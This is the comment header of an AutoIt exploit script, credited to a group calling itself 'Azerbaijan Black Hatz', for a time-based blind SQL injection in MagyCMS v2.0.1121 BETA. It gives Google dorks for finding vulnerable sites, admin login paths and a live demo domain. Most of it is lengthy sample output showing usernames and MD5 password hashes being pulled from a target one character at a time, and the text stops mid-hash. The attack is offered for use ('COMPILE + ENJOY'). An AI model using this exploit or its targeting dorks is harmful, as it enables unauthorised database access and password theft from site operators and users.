#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_Outfile=cpl.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#NoTrayIcon
#include <Array.au3>
#include <Inet.au3>
#include <String.au3>
#include <File.au3>
#cs
THIS IS A COMPLETE EXPLOIT WHICH IS WRITEN IN AUTOIT SCRIPTING/PROGRAMMING LANGUAGE.
THIS IS A CONSOLE APPLICATION.
IT'S MAIN PURPOSE TO EXPLOIT BLIND SQL INJECTION VULNERABILITY IN magy cms v 2.0.1121 BETA USING TIME BASED WAY and obtain usernames + MD5 passwords.
Default it'll obtain 5 usernames and corresponding MD5 PASSWORDS from vulnerable site.
Since it uses time based way it is really slow exploit.But it is more convenient way than manual work;)
In fact i coded it For Fun because we always prefer manual work.
* ANYWAYS, save it as in eg: poc.au3 and COMPILE + ENJOY) *
#ce
#cs
============ * AZERBAIJAN BLACK HATZ PRESENTS!) * ==================
--------------------------------------------------------------------
Vulnerable Software: MagyCMS v2.0.1121 BETA (Previous and Newest versions also affected)
Vendor: http://www.emagy.com && broncoway.com
--------------------------------------------------------------------
Vuln Type: Blind SQL injection
Exploitation technique: Time Based.
Exploit: Available
--------------------------------------------------------------------
Credits: AkaStep & BOT_25 & CAMOUFL4G3
--------------------------------------------------------------------
ShouTz to mariaoza;)
CAMOUFL4G3 says: FreeDom is Paradise :P
DORK 1:
google+ site:am Website by Broncoway
DORK 2: google+ site:am inurl: /magycms/
Admin Panel:
site.tld/magycms/Admin/
or
site.tld/magycms/Admin/Login.php
Demo: http://www.sgp.am
--------------------------------------------------------------------
Example usage of exploit:
cmd.exe
>D:\programming1\magy_exploit\poc_HAZIR_USERNAME_DONE\x_azirmagy_exploit>cpl.exe http://192.168.0.15/learn/pwnmagyasap/
######################################################
# MagyCMS v2.0.1121 BETA Blind SQL Injection Exploit #
# Exploitation technique: Time Based #
# Author: AkaStep & BOT_25 #
######################################################
----------------------------------------
[+] Verifying your internet connection.... Please Wait...[+]
----------------------------------------
----------------------------------------
[+] Inet Connection is OK .... [+]
----------------------------------------
----------------------------------------
[+] Verifying is Target Site Vulnerable? Please wait...[+]
----------------------------------------
----------------------------------------
[+] Reply from target site: [+]
----------------------------------------
[+] - - - - * Vulnerable! * - - - - . [+]
----------------------------------------
[+] Trying to get average value for sleep(1) if condition is TRUE...[+]
----------------------------------------
[+] Please wait... [+]
----------------------------------------
----------------------------------------
[+] AVG sleep timeout FOR TRUE CONDITION IS: 1087 ms [+]
----------------------------------------
----------------------------------------
[+] AVG sleep timeout FOR FALSE CONDITION IS: 93 ms [+]
----------------------------------------
----------------------------------------
[+] Getting To Fetch Username(s) from table... Please wait... [+]
----------------------------------------
[+] TRUE AT OFFSET [0] Currently : [m]. Responce Time: 1066.51545360847 ms. Logging to axa.txt... [+]
[+] TRUE AT OFFSET [0] Currently : [ma]. Responce Time: 1044.58516260608 ms. Logging to axa.txt... [+]
[+] TRUE AT OFFSET [0] Currently : [man]. Responce Time: 1086.89845022196 ms. Logging to axa.txt... [+]
[+] TRUE AT OFFSET [0] Currently : [mana]. Responce Time: 1046.11742474319 ms. Logging to axa.txt... [+]
[+] TRUE AT OFFSET [0] Currently : [manag]. Responce Time: 1070.21242516611 ms. Logging to axa.txt... [+]
[+] TRUE AT OFFSET [0] Currently : [manage]. Responce Time: 1063.79253086555 ms. Logging to axa.txt... [+]
[+] TRUE AT OFFSET [0] Currently : [manager]. Responce Time: 1107.93347514309 ms. Logging to axa.txt... [+]
[+] TRUE AT OFFSET [1] Currently : [r]. Responce Time: 1079.4193285235 ms. Logging to axa.txt... [+]
[+] TRUE AT OFFSET [1] Currently : [ro]. Responce Time: 1092.09901537247 ms. Logging to axa.txt... [+]
[+] TRUE AT OFFSET [1] Currently : [roo]. Responce Time: 1266.5817253381 ms. Logging to axa.txt... [+]
[+] TRUE AT OFFSET [1] Currently : [root]. Responce Time: 1097.96913476208 ms. Logging to axa.txt... [+]
[+] TRUE AT OFFSET [2] Currently : [d]. Responce Time: 1082.47758977717 ms. Logging to axa.txt... [+]
[+] TRUE AT OFFSET [3] Currently : [t]. Responce Time: 1074.85995733176 ms. Logging to axa.txt... [+]
[+] TRUE AT OFFSET [3] Currently : [te]. Responce Time: 1088.53933904958 ms. Logging to axa.txt... [+]
[+] TRUE AT OFFSET [3] Currently : [tes]. Responce Time: 1080.99278273973 ms. Logging to axa.txt... [+]
[+] TRUE AT OFFSET [3] Currently : [test]. Responce Time: 1073.98846265903 ms. Logging to axa.txt... [+]
----------------------------------------
[#] Username0 => [manager] [#]
----------------------------------------
----------------------------------------
[#] Username1 => [root] [#]
----------------------------------------
----------------------------------------
[#] Username2 => [d] [#]
----------------------------------------
----------------------------------------
[#] Username3 => [test] [#]
----------------------------------------
----------------------------------------
* Total 4 users *
----------------------------------------
----------------------------------------
[+] END OF USERNAME FETCHING. PREVIOUS RECORDS ARE COMPLETE USERNAMES [+]
----------------------------------------
----------------------------------------
[+] GOING TO FETCH MD5 PASSWORDS. This may take few minutes too. Please wait... [+]
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 0
Responce Time: 1122.93256476205 ms.
Need to fetch other: [31] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04
Responce Time: 1147.73191815969 ms.
Need to fetch other: [30] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e
Responce Time: 1093.4105956323 ms.
Need to fetch other: [29] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8
Responce Time: 1086.12022668676 ms.
Need to fetch other: [28] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e
Responce Time: 1088.69703233325 ms.
Need to fetch other: [27] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e4
Responce Time: 1079.73130163186 ms.
Need to fetch other: [26] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47
Responce Time: 1089.67269514766 ms.
Need to fetch other: [25] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e
Responce Time: 1120.84654283897 ms.
Need to fetch other: [24] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e6
Responce Time: 1096.57454880375 ms.
Need to fetch other: [23] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68
Responce Time: 1197.06674603001 ms.
Need to fetch other: [22] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a
Responce Time: 1117.15728038546 ms.
Need to fetch other: [21] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7
Responce Time: 1074.80582819299 ms.
Need to fetch other: [20] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b
Responce Time: 1090.67017703246 ms.
Need to fetch other: [19] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b5
Responce Time: 1095.4439395126 ms.
Need to fetch other: [18] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58
Responce Time: 1079.56000213028 ms.
Need to fetch other: [17] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b585
Responce Time: 1121.39697688334 ms.
Need to fetch other: [16] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b5859
Responce Time: 1069.7244734608 ms.
Need to fetch other: [15] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594
Responce Time: 1088.90167696824 ms.
Need to fetch other: [14] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594f
Responce Time: 1090.38322342555 ms.
Need to fetch other: [13] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fd
Responce Time: 1131.33884657918 ms.
Need to fetch other: [12] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdc
Responce Time: 1085.94070681407 ms.
Need to fetch other: [11] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf
Responce Time: 1086.03164216324 ms.
Need to fetch other: [10] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf9
Responce Time: 1085.01732856736 ms.
Need to fetch other: [9] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf99
Responce Time: 1090.81806852607 ms.
Need to fetch other: [8] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994
Responce Time: 1164.10285238106 ms.
Need to fetch other: [7] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c
Responce Time: 1087.62590294072 ms.
Need to fetch other: [6] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5
Responce Time: 1084.24126538578 ms.
Need to fetch other: [5] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d
Responce Time: 1110.72200045738 ms.
Need to fetch other: [4] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d4
Responce Time: 1095.35167837798 ms.
Need to fetch other: [3] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d49
Responce Time: 1100.45665915848 ms.
Need to fetch other: [2] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d490
Responce Time: 1141.79013618122 ms.
Need to fetch other: [1] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [0] [+]
Currently MD5 hash is : 04e8e47e68a7b58594fdcf994c5d490d
Responce Time: 1166.55627727462 ms.
Need to fetch other: [ *NONE* ] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e
Responce Time: 1171.26590832908 ms.
Need to fetch other: [31] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e1
Responce Time: 1132.57401498087 ms.
Need to fetch other: [30] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10
Responce Time: 1208.55810555533 ms.
Need to fetch other: [29] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10a
Responce Time: 1123.42031597051 ms.
Need to fetch other: [28] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10ad
Responce Time: 1122.12616389991 ms.
Need to fetch other: [27] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc
Responce Time: 1082.92028182339 ms.
Need to fetch other: [26] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3
Responce Time: 1089.85126266028 ms.
Need to fetch other: [25] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc39
Responce Time: 1140.08007343197 ms.
Need to fetch other: [24] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc394
Responce Time: 1148.83027251909 ms.
Need to fetch other: [23] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949
Responce Time: 1091.6165547748 ms.
Need to fetch other: [22] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949b
Responce Time: 1087.22355838061 ms.
Need to fetch other: [21] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba
Responce Time: 1073.28650311553 ms.
Need to fetch other: [20] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba5
Responce Time: 1075.00146049429 ms.
Need to fetch other: [19] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59
Responce Time: 1075.08258904097 ms.
Need to fetch other: [18] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59a
Responce Time: 1103.84616628081 ms.
Need to fetch other: [17] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59ab
Responce Time: 1088.21680476932 ms.
Need to fetch other: [16] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abb
Responce Time: 1091.30892994201 ms.
Need to fetch other: [15] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe
Responce Time: 1120.06679051525 ms.
Need to fetch other: [14] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe5
Responce Time: 1102.02194814024 ms.
Need to fetch other: [13] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56
Responce Time: 1142.12833929081 ms.
Need to fetch other: [12] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e
Responce Time: 1103.72041465256 ms.
Need to fetch other: [11] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e0
Responce Time: 1111.04395079055 ms.
Need to fetch other: [10] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e05
Responce Time: 1214.34433706028 ms.
Need to fetch other: [9] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057
Responce Time: 1163.34768347812 ms.
Need to fetch other: [8] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f
Responce Time: 1201.57191540286 ms.
Need to fetch other: [7] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f2
Responce Time: 1138.68858765629 ms.
Need to fetch other: [6] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20
Responce Time: 1116.66783999098 ms.
Need to fetch other: [5] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20f
Responce Time: 1098.96241373153 ms.
Need to fetch other: [4] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20f8
Responce Time: 1130.48200572043 ms.
Need to fetch other: [3] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20f88
Responce Time: 1108.71546050055 ms.
Need to fetch other: [2] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20f883
Responce Time: 1116.813345572 ms.
Need to fetch other: [1] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [1] [+]
Currently MD5 hash is : e10adc3949ba59abbe56e057f20f883e
Responce Time: 1088.2162383657 ms.
Need to fetch other: [ *NONE* ] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 3
Responce Time: 1112.91223563393 ms.
Need to fetch other: [31] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 32
Responce Time: 1103.2336007669 ms.
Need to fetch other: [30] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326
Responce Time: 1073.39268625061 ms.
Need to fetch other: [29] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 3263
Responce Time: 1078.83931116799 ms.
Need to fetch other: [28] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 32637
Responce Time: 1073.24368450567 ms.
Need to fetch other: [27] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373
Responce Time: 1097.87935978848 ms.
Need to fetch other: [26] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373d
Responce Time: 1156.96056540113 ms.
Need to fetch other: [25] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da
Responce Time: 1072.94168611591 ms.
Need to fetch other: [24] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da5
Responce Time: 1109.29933992676 ms.
Need to fetch other: [23] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da56
Responce Time: 1078.17109775162 ms.
Need to fetch other: [22] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562
Responce Time: 1091.15269276676 ms.
Need to fetch other: [21] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da5622
Responce Time: 1076.48035788689 ms.
Need to fetch other: [20] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da56226
Responce Time: 1135.50237933379 ms.
Need to fetch other: [19] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269
Responce Time: 1203.56181913304 ms.
Need to fetch other: [18] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da5622693
Responce Time: 1090.62271190795 ms.
Need to fetch other: [17] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da56226931
Responce Time: 1092.65591544045 ms.
Need to fetch other: [16] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316
Responce Time: 1100.2446888696 ms.
Need to fetch other: [15] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da5622693167
Responce Time: 1094.95098541072 ms.
Need to fetch other: [14] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da56226931679
Responce Time: 1128.80178191581 ms.
Need to fetch other: [13] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790
Responce Time: 1169.40833252404 ms.
Need to fetch other: [12] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da5622693167903
Responce Time: 1096.74959509033 ms.
Need to fetch other: [11] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da56226931679032
Responce Time: 1178.17792216336 ms.
Need to fetch other: [10] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326
Responce Time: 1106.2009016093 ms.
Need to fetch other: [9] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c
Responce Time: 1300.28445742105 ms.
Need to fetch other: [8] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c0
Responce Time: 1092.92270156983 ms.
Need to fetch other: [7] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c00
Responce Time: 1127.17008586904 ms.
Need to fetch other: [6] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c00a
Responce Time: 1098.36618620519 ms.
Need to fetch other: [5] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c00a9
Responce Time: 1113.63942520058 ms.
Need to fetch other: [4] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c00a99
Responce Time: 1125.85533775888 ms.
Need to fetch other: [3] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c00a997
Responce Time: 1151.71279577202 ms.
Need to fetch other: [2] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c00a9972
Responce Time: 1133.74918720454 ms.
Need to fetch other: [1] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [2] [+]
Currently MD5 hash is : 326373da562269316790326c00a9972f
Responce Time: 1126.98230301967 ms.
Need to fetch other: [ *NONE* ] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 7
Responce Time: 1109.83144103983 ms.
Need to fetch other: [31] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74
Responce Time: 1098.13795060885 ms.
Need to fetch other: [30] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a
Responce Time: 1096.22027336493 ms.
Need to fetch other: [29] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5
Responce Time: 1112.61976585727 ms.
Need to fetch other: [28] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d
Responce Time: 1142.74313282603 ms.
Need to fetch other: [27] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1
Responce Time: 1084.91810768561 ms.
Need to fetch other: [26] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1f
Responce Time: 1112.79996992547 ms.
Need to fetch other: [25] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ff
Responce Time: 1098.22970548891 ms.
Need to fetch other: [24] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffc
Responce Time: 1162.94171493733 ms.
Need to fetch other: [23] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce
Responce Time: 1288.16907398647 ms.
Need to fetch other: [22] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce4
Responce Time: 1141.83313523826 ms.
Need to fetch other: [21] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce47
Responce Time: 1103.65852377924 ms.
Need to fetch other: [20] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472
Responce Time: 1168.90490496762 ms.
Need to fetch other: [19] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f
Responce Time: 1096.50154288596 ms.
Need to fetch other: [18] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0
Responce Time: 1139.7646542839 ms.
Need to fetch other: [17] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f02
Responce Time: 1108.4753730338 ms.
Need to fetch other: [16] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f020
Responce Time: 1088.28836460353 ms.
Need to fetch other: [15] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206
Responce Time: 1077.87990864862 ms.
Need to fetch other: [14] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206d
Responce Time: 1079.14208898928 ms.
Need to fetch other: [13] symbol(s).
Logging to axa.txt...
----------------------------------------
----------------------------------------
[+] TRUE AT OFFSET [3] [+]
Currently MD5 hash is : 74a5d1ffce472f0206dd
